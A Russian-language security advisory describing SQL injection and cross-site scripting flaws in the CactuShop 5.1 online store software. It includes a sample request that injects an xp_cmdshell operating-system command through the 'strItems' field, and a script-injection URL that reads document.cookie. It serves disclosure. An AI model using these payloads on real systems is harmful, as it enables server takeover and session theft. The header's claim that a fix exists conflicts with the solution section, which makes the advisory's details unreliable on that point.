Дата публикации: | 02.04.2004 |
Всего просмотров: | 1287 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | CactuShop 5.x |
Уязвимые версии: CactuShop 5.1
Описание: Несколько уязвимостей обнаружено в CactuShop. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционноц системы. Удаленный пользователь может выполнить XSS нападение. Сценарии 'mailorder.asp' и 'payonline.asp' не проверяют данные, представленные пользователем в параметре 'strItems'. Пример: strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=& CD_AffiliateID=&CD _CardholderCountry=200&CD_ShippingCountry=200& CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1& numCurrencyID=1&numItemCount=2&strItems=214;+ exec+master..xp_cmdshell+'dir+c:'--z165z& strQuantities=6z2z&numShipMethod=1&btnProceed=ProceedТакже сообщается что сценарий 'largeimage.asp' не фильтрует HTMl код, представленный пользователем: http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script> URL производителя:http://www.cactushop.com/main/default.asp Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | S-Quadra Advisory #2004-03-31 |